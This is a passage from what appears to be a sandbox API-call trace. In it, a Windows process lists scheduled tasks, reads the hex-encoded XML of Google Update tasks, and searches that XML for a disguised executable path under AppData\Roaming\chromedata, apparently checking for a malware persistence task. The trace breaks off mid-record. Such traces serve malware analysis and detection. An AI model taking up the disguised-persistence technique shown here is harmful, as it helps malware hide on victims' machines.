	[0073.080] IRegisteredTask:get_Xml (in: This=0x552308, pXml=0x12918c | out: pXml=0x12918c*="\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x31\x36\x22\x3f\x3e\x0d\x0a\x3c\x54\x61\x73\x6b\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x32\x22\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x73\x63\x68\x65\x6d\x61\x73\x2e\x6d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2e\x63\x6f\x6d\x2f\x77\x69\x6e\x64\x6f\x77\x73\x2f\x32\x30\x30\x34\x2f\x30\x32\x2f\x6d\x69\x74\x2f\x74\x61\x73\x6b\x22\x3e\x0d\x0a\x20\x20\x3c\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x56\x65\x72\x73\x69\x6f\x6e\x3e\x31\x2e\x33\x2e\x33\x33\x2e\x35\x3c\x2f\x56\x65\x72\x73\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x48\xe4\x6c\x74\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x61\x75\x66\x20\x64\x65\x6d\x20\x6e\x65\x75\x65\x73\x74\x65\x6e\x20\x53\x74\x61\x6e\x64\x2e\x20\x46\x61\x6c\x6c\x73\x20\x64\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x61\x6b\x74\x69\x76\x69\x65\x72\x74\x20\x6f\x64\x65\x72\x20\x61\x6e\x67\x65\x68\x61\x6c\x74\x65\x6e\x20\x77\x69\x72\x64\x2c\x20\x77\x69\x72\x64\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x6b\x74\x75\x61\x6c\x69\x73\x69\x65\x72\x74\x2e\x20\x44\x61\x73\x20\x68\x65\x69\xdf\x74\x2c\x20\x64\x61\x73\x73\x20\x65\x76\x65\x6e\x74\x75\x65\x6c\x6c\x20\x61\x75\x66\x74\x72\x65\x74\x65\x6e\x64\x65\x20\x53\x69\x63\x68\x65\x72\x68\x65\x69\x74\x73\x6c\xfc\x63\x6b\x65\x6e\x20\x6e\x69\x63\x68\x74\x20\x62\x65\x68\x6f\x62\x65\x6e\x20\x75\x6e\x64\x20\x62\x65\x73\x74\x69\x6d\x6d\x74\x65\x20\x46\x75\x6e\x6b\x74\x69\x6f\x6e\x65\x6e\x20\x6d\xf6\x67\x6c\x69\x63\x68\x65\x72\x77\x65\x69\x73\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x75\x73\x67\x65\x66\xfc\x68\x72\x74\x20\x77\x65\x72\x64\x65\x6e\x20\x6b\xf6\x6e\x6e\x65\x6e\x2e\x20\x44\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x69\x6e\x73\x74\x61\x6c\x6c\x69\x65\x72\x74\x20\x73\x69\x63\x68\x20\x73\x65\x6c\x62\x73\x74\x2c\x20\x77\x65\x6e\x6e\x20\x73\x69\x65\x20\x6e\x69\x63\x68\x74\x20\x76\x6f\x6e\x20\x65\x69\x6e\x65\x72\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x76\x65\x72\x77\x65\x6e\x64\x65\x74\x20\x77\x69\x72\x64\x2e\x3c\x2f\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x3c\x2f\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x3c\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x4c\x6f\x67\x6f\x6e\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x45\x6e\x61\x62\x6c\x65\x64\x3e\x74\x72\x75\x65\x3c\x2f\x45\x6e\x61\x62\x6c\x65\x64\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x4c\x6f\x67\x6f\x6e\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x32\x30\x31\x37\x2d\x31\x30\x2d\x31\x39\x54\x31\x33\x3a\x31\x36\x3a\x30\x37\x3c\x2f\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x31\x3c\x2f\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x3c\x2f\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x20\x69\x64\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x55\x73\x65\x72\x49\x64\x3e\x53\x2d\x31\x2d\x35\x2d\x31\x38\x3c\x2f\x55\x73\x65\x72\x49\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x48\x69\x67\x68\x65\x73\x74\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3c\x2f\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x3e\x0d\x0a\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x3c\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x49\x67\x6e\x6f\x72\x65\x4e\x65\x77\x3c\x2f\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x74\x72\x75\x65\x3c\x2f\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x6e\x61\x62\x6c\x65\x64\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x45\x6e\x61\x62\x6c\x65\x64\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x50\x54\x37\x32\x48\x3c\x2f\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x0d\x0a\x20\x20\x3c\x2f\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x3c\x41\x63\x74\x69\x6f\x6e\x73\x20\x43\x6f\x6e\x74\x65\x78\x74\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x43\x3a\x5c\x50\x72\x6f\x67\x72\x61\x6d\x20\x46\x69\x6c\x65\x73\x5c\x47\x6f\x6f\x67\x6c\x65\x5c\x55\x70\x64\x61\x74\x65\x5c\x47\x6f\x6f\x67\x6c\x65\x55\x70\x64\x61\x74\x65\x2e\x65\x78\x65\x3c\x2f\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x2f\x63\x3c\x2f\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x3c\x2f\x41\x63\x74\x69\x6f\x6e\x73\x3e\x0d\x0a\x3c\x2f\x54\x61\x73\x6b\x3e") returned 0x0
	[0073.086] StrStrIW (lpFirst="\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x31\x36\x22\x3f\x3e\x0d\x0a\x3c\x54\x61\x73\x6b\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x32\x22\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x73\x63\x68\x65\x6d\x61\x73\x2e\x6d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2e\x63\x6f\x6d\x2f\x77\x69\x6e\x64\x6f\x77\x73\x2f\x32\x30\x30\x34\x2f\x30\x32\x2f\x6d\x69\x74\x2f\x74\x61\x73\x6b\x22\x3e\x0d\x0a\x20\x20\x3c\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x56\x65\x72\x73\x69\x6f\x6e\x3e\x31\x2e\x33\x2e\x33\x33\x2e\x35\x3c\x2f\x56\x65\x72\x73\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x48\xe4\x6c\x74\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x61\x75\x66\x20\x64\x65\x6d\x20\x6e\x65\x75\x65\x73\x74\x65\x6e\x20\x53\x74\x61\x6e\x64\x2e\x20\x46\x61\x6c\x6c\x73\x20\x64\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x61\x6b\x74\x69\x76\x69\x65\x72\x74\x20\x6f\x64\x65\x72\x20\x61\x6e\x67\x65\x68\x61\x6c\x74\x65\x6e\x20\x77\x69\x72\x64\x2c\x20\x77\x69\x72\x64\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x6b\x74\x75\x61\x6c\x69\x73\x69\x65\x72\x74\x2e\x20\x44\x61\x73\x20\x68\x65\x69\xdf\x74\x2c\x20\x64\x61\x73\x73\x20\x65\x76\x65\x6e\x74\x75\x65\x6c\x6c\x20\x61\x75\x66\x74\x72\x65\x74\x65\x6e\x64\x65\x20\x53\x69\x63\x68\x65\x72\x68\x65\x69\x74\x73\x6c\xfc\x63\x6b\x65\x6e\x20\x6e\x69\x63\x68\x74\x20\x62\x65\x68\x6f\x62\x65\x6e\x20\x75\x6e\x64\x20\x62\x65\x73\x74\x69\x6d\x6d\x74\x65\x20\x46\x75\x6e\x6b\x74\x69\x6f\x6e\x65\x6e\x20\x6d\xf6\x67\x6c\x69\x63\x68\x65\x72\x77\x65\x69\x73\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x75\x73\x67\x65\x66\xfc\x68\x72\x74\x20\x77\x65\x72\x64\x65\x6e\x20\x6b\xf6\x6e\x6e\x65\x6e\x2e\x20\x44\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x69\x6e\x73\x74\x61\x6c\x6c\x69\x65\x72\x74\x20\x73\x69\x63\x68\x20\x73\x65\x6c\x62\x73\x74\x2c\x20\x77\x65\x6e\x6e\x20\x73\x69\x65\x20\x6e\x69\x63\x68\x74\x20\x76\x6f\x6e\x20\x65\x69\x6e\x65\x72\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x76\x65\x72\x77\x65\x6e\x64\x65\x74\x20\x77\x69\x72\x64\x2e\x3c\x2f\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x3c\x2f\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x3c\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x4c\x6f\x67\x6f\x6e\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x45\x6e\x61\x62\x6c\x65\x64\x3e\x74\x72\x75\x65\x3c\x2f\x45\x6e\x61\x62\x6c\x65\x64\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x4c\x6f\x67\x6f\x6e\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x32\x30\x31\x37\x2d\x31\x30\x2d\x31\x39\x54\x31\x33\x3a\x31\x36\x3a\x30\x37\x3c\x2f\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x31\x3c\x2f\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x3c\x2f\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x20\x69\x64\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x55\x73\x65\x72\x49\x64\x3e\x53\x2d\x31\x2d\x35\x2d\x31\x38\x3c\x2f\x55\x73\x65\x72\x49\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x48\x69\x67\x68\x65\x73\x74\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3c\x2f\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x3e\x0d\x0a\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x3c\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x49\x67\x6e\x6f\x72\x65\x4e\x65\x77\x3c\x2f\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x74\x72\x75\x65\x3c\x2f\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x6e\x61\x62\x6c\x65\x64\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x45\x6e\x61\x62\x6c\x65\x64\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x50\x54\x37\x32\x48\x3c\x2f\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x0d\x0a\x20\x20\x3c\x2f\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x3c\x41\x63\x74\x69\x6f\x6e\x73\x20\x43\x6f\x6e\x74\x65\x78\x74\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x43\x3a\x5c\x50\x72\x6f\x67\x72\x61\x6d\x20\x46\x69\x6c\x65\x73\x5c\x47\x6f\x6f\x67\x6c\x65\x5c\x55\x70\x64\x61\x74\x65\x5c\x47\x6f\x6f\x67\x6c\x65\x55\x70\x64\x61\x74\x65\x2e\x65\x78\x65\x3c\x2f\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x2f\x63\x3c\x2f\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x3c\x2f\x41\x63\x74\x69\x6f\x6e\x73\x3e\x0d\x0a\x3c\x2f\x54\x61\x73\x6b\x3e", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.087] IUnknown:Release (This=0x552308) returned 0x0
	[0073.087] IRegisteredTaskCollection:get_Item (in: This=0x552948, index=0x12907c*(varType=0x3, wReserved1=0x55, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x129180 | out: ppRegisteredTask=0x129180*=0x552308) returned 0x0
	[0073.087] IRegisteredTask:get_Name (in: This=0x552308, pName=0x129184 | out: pName=0x129184*="GoogleUpdateTaskMachineUA") returned 0x0
	[0073.087] IRegisteredTask:get_Xml (in: This=0x552308, pXml=0x12918c | out: pXml=0x12918c*="\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x31\x36\x22\x3f\x3e\x0d\x0a\x3c\x54\x61\x73\x6b\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x32\x22\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x73\x63\x68\x65\x6d\x61\x73\x2e\x6d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2e\x63\x6f\x6d\x2f\x77\x69\x6e\x64\x6f\x77\x73\x2f\x32\x30\x30\x34\x2f\x30\x32\x2f\x6d\x69\x74\x2f\x74\x61\x73\x6b\x22\x3e\x0d\x0a\x20\x20\x3c\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x56\x65\x72\x73\x69\x6f\x6e\x3e\x31\x2e\x33\x2e\x33\x33\x2e\x35\x3c\x2f\x56\x65\x72\x73\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x48\xe4\x6c\x74\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x61\x75\x66\x20\x64\x65\x6d\x20\x6e\x65\x75\x65\x73\x74\x65\x6e\x20\x53\x74\x61\x6e\x64\x2e\x20\x46\x61\x6c\x6c\x73\x20\x64\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x61\x6b\x74\x69\x76\x69\x65\x72\x74\x20\x6f\x64\x65\x72\x20\x61\x6e\x67\x65\x68\x61\x6c\x74\x65\x6e\x20\x77\x69\x72\x64\x2c\x20\x77\x69\x72\x64\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x6b\x74\x75\x61\x6c\x69\x73\x69\x65\x72\x74\x2e\x20\x44\x61\x73\x20\x68\x65\x69\xdf\x74\x2c\x20\x64\x61\x73\x73\x20\x65\x76\x65\x6e\x74\x75\x65\x6c\x6c\x20\x61\x75\x66\x74\x72\x65\x74\x65\x6e\x64\x65\x20\x53\x69\x63\x68\x65\x72\x68\x65\x69\x74\x73\x6c\xfc\x63\x6b\x65\x6e\x20\x6e\x69\x63\x68\x74\x20\x62\x65\x68\x6f\x62\x65\x6e\x20\x75\x6e\x64\x20\x62\x65\x73\x74\x69\x6d\x6d\x74\x65\x20\x46\x75\x6e\x6b\x74\x69\x6f\x6e\x65\x6e\x20\x6d\xf6\x67\x6c\x69\x63\x68\x65\x72\x77\x65\x69\x73\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x75\x73\x67\x65\x66\xfc\x68\x72\x74\x20\x77\x65\x72\x64\x65\x6e\x20\x6b\xf6\x6e\x6e\x65\x6e\x2e\x20\x44\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x69\x6e\x73\x74\x61\x6c\x6c\x69\x65\x72\x74\x20\x73\x69\x63\x68\x20\x73\x65\x6c\x62\x73\x74\x2c\x20\x77\x65\x6e\x6e\x20\x73\x69\x65\x20\x6e\x69\x63\x68\x74\x20\x76\x6f\x6e\x20\x65\x69\x6e\x65\x72\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x76\x65\x72\x77\x65\x6e\x64\x65\x74\x20\x77\x69\x72\x64\x2e\x3c\x2f\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x3c\x2f\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x3c\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x32\x30\x31\x37\x2d\x31\x30\x2d\x31\x39\x54\x31\x33\x3a\x31\x36\x3a\x30\x38\x3c\x2f\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x52\x65\x70\x65\x74\x69\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x50\x54\x31\x48\x3c\x2f\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x44\x75\x72\x61\x74\x69\x6f\x6e\x3e\x50\x31\x44\x3c\x2f\x44\x75\x72\x61\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x52\x65\x70\x65\x74\x69\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x31\x3c\x2f\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x3c\x2f\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x20\x69\x64\x3d